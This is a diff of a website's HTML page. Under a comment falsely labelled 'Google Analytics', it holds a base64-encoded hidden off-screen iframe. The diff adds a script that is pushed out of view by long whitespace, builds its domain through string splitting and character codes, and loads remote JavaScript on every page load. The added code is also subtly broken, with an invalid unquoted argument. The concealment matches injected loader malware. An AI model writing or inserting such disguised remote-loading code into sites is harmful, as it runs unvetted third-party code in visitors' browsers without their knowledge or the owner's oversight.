--- a/page1.html
+++ b/page1.html
@@ -27,6 +27,15 @@
 
 <!-- Google Analytics -->
 <script>(function(d,c) {var i=c||'preload',u,ifw='PGlmcmFtZSB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlO3RvcDotMTAwMHB4OyIgc3JjPSJodHRwczovL3N1bi5lZHV6ei5jb20vcGl4ZWwve2lkfSI+PC9pZnJhbWU+';d.write(atob(ifw).replace('{id}',i));})(document,260269);</script>
+
+<script>
+                                                                                                                        (function(i,s,o,g,c,f,r,a,m)
+                                                                                                                        {i['edzpx_c']=c;i['edzpx_a']=f;i['PxEdz']=r;i[r]=i[r]||
+                                                                                                                        function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();
+                                                                                                                        a=s.createElement(o),m=s.getElementsByTagName(o)[0]||
+                                                                                                                        s.getElementsByTagName('head')[0];
+                                                                                                                        e='https://e';g=e+'duzz'+'.'+String.fromCharCode(105, 110, 102, 111)+'/'+g;a.async=1;
+                                                                                                                        a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','dev/js/px.js',39FTI,22263133,'edzpx');</script>
 <!-- /Google Analytics -->
 
 
@@ -60,7 +69,7 @@
     </nav>
 </section>
 
-<section class="engine"><a href="https://mobirise.info/f">simple web builder</a></section><section once="footers" class="cid-rwOTMrjJPQ" id="footer6-f">
+<section class="engine"><a href="https://mobirise.info/w">free html5 templates</a></section><section once="footers" class="cid-rwOTMrjJPQ" id="footer6-f">
 
     
 
